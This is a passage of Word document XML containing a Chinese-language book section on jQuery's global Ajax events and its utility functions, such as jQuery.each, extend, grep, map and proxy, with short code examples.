        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#loading_animation").bind({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ajaxStart:function(){$(this).show();},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ajaxStop:function(){$(this).hide();}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这些</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxStart</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxStop</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序可以绑定到任意文档元素上：</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>是全局地触发它们（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）而不是在某个特定元素上触发。其他</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxSend</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxSuccess</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxError</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ajaxComplete</w:t>
      </w:r>
      <w:r>
        <w:t>，通常也是全局触发的，因此处理程序也可以绑定到任何元素上。然而，如果在调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>时设置了</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>选项，则这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个事件不会全局地触发，而会在</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>元素上触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，记住可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:t>选项为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>来阻止</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>触发任何</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>相关的事件。尽管这个选项名很让人迷惑，但是设置</w:t>
      </w:r>
      <w:r>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>可以让</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>不再在</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发事件以及不再全局地触发事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="496" w:name="19_7_Gong_Ju_Han_Shu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>19.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　工具函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库定义了不少工具函数（还有两个属性），在编写程序时挺有用。在下面的列表中你会发现，部分函数在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>）中已经有了等价形式。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的函数比</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>早，并且可以工作在所有浏览器中。按照字母排序，将这些工具函数列举如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:t>属性不是一个函数而</w:t>
      </w:r>
      <w:r>
        <w:t>是一个对象，可用于客户端嗅探（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.4.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果浏览器是</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>，该对象会拥有一个</w:t>
      </w:r>
      <w:r>
        <w:t>msie</w:t>
      </w:r>
      <w:r>
        <w:t>属性，值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果浏览器是</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>或与其相关，会有一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>属性。同样，在</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>webkit</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；在</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>opera</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。除了与浏览器相关的属性，还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:t>属性，包含浏览器的版本号。尽量不要使用客户端嗅探，但是可以通过以下代码使用该属性来解决浏览器相关的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if($.browser.mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>parse</w:t>
      </w:r>
      <w:r>
        <w:t>Int($.browser.version)</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>4){//</w:t>
      </w:r>
      <w:r>
        <w:t>在此解决一个假设的</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox bug...</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jQuery.contains()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该函数接受两个文档元素作为参数。如果第一个元素包含第二个元素，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.each()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不同，</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只能遍历</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.each()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数可以遍历数组元素或对象属性。第一个参数是要遍历的数组或对象；第二个参数是要在每个数组元素或对象属性上调用的函数。该函数在调用时会带有两个</w:t>
      </w:r>
      <w:r>
        <w:t>参数：数组元素的序号或对象的属性名，以及数组元素的值或对象的属性值。函数中的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值和第二个参数是一样的。如果该函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.each()</w:t>
      </w:r>
      <w:r>
        <w:t>会停止当前遍历并立刻返回。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.each()</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回第一个参数的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.each()</w:t>
      </w:r>
      <w:r>
        <w:t>会使用普通的</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环来遍历对象属性，所以会遍历所有可枚举的属性，包括继承的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.each()</w:t>
      </w:r>
      <w:r>
        <w:t>在遍历数组元素时，会以序号从小到大来遍历，不会跳过稀疏数组中的</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.extend()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数接受对象</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数。它会将第二个及其以后参数对象的属性复制到第一个参数对象中，如果同名的属性在第一个参数对象</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>中已经存在，则会覆盖它。该函数会忽略任何值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。如果仅传入了一个对象，该对象的属性会被复制到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象自身中。该对象的返回值是属性被复制到的对象。如果一个参数的值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，会执行深拷贝：第三个（及其以后）对象的属性会被复制到第二个对象上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数用来复制对象以及合并带有几组默认值的选项对象时非常有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var clone=jQuery.extend({},origina</w:t>
      </w:r>
      <w:r>
        <w:t>l);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var options=jQuery.extend({},default_optinos,user_options);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.globalEval()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数会在全局上下文中执行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码字符串，就像它是＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的内容一样。（实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>实现该函数时，就是通过创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素并临时把它插入文档中来实现的。）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.grep()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似。它接受数组作为第一个参数，以及一个判断函数作为第二个参数，该判断函数会</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在数组的每一个元素上调用，调用时会传入元素值和元素序号作为参数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.grep()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新数组，新数组由调用判断函数时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>（或其他真值）的元素组成。如果给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.grep()</w:t>
      </w:r>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>作为第三个参数，则它会反转判断函数，返回的数组将会由判断函数调用时为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或其他假值的元素组成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.inArray()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>ind</w:t>
      </w:r>
      <w:r>
        <w:t>exOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似。它的第一个参数可以是任意值，第二个参数则是数组（或类数组对象），返回值是第一个参数值在数组中第一次出现的序号，如果该参数值不存在的话，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isArray()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当参数是原生</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>对象时，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isEmptyObject()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当参数对象没有可枚举的属性时，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isFunction()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当参数是原生</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象时，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及以前版本中，</w:t>
      </w:r>
      <w:r>
        <w:t>window.alert()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>window.atta</w:t>
      </w:r>
      <w:r>
        <w:t>chEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>等浏览器方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isPlainObject()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果参数是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>纯</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而不是某些特定类型或类的对象的实例时，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.makeArray()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果参数是类数组对象，该函数会将对象的属性复制到一个新的（真）数组中，并返回该数组。如果参数不是类数组对象，该函数会仅返回一个新数组，该数组只包含传入的参数一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.map()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似。它接受数组或类数组对象作为第一个参数；第二个参数则为映射函</w:t>
      </w:r>
      <w:r>
        <w:t>数。每一个数组元素与其序号都会传入这映射函数中，返回值就是由映射函数返回的值组成的新数组。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.map()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>ES5 map()</w:t>
      </w:r>
      <w:r>
        <w:t>方法存在两点不同。首先，如果映射函数返回的是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，该值不会被包含在返回的数组中。其次，如果映射函数返回的是数组，该数组的元素会被添加到结果数组中，而不是数组本身中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.merge()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数接受两个数组或类数组对象。它会将第二个参数的元素添加到第一个上面，并返回第一个参数。第一个数组会修改，第二个不会。可以使用该函数来浅拷贝类数组对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var clone=</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.merge([],original);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.parseJSON()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数会解析</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串，返回解析结果。当传入的格式有误时，它会抛出异常。在定义它的浏览器中</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>使用标准的</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。注意</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>只定义</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>解析函数，而没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>序列化函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.proxy()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该函数和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）类似。它接受函数作为第一个参数，对象作为第二个参数，并返回一个新函数，该函数会作为第二个参</w:t>
      </w:r>
      <w:r>
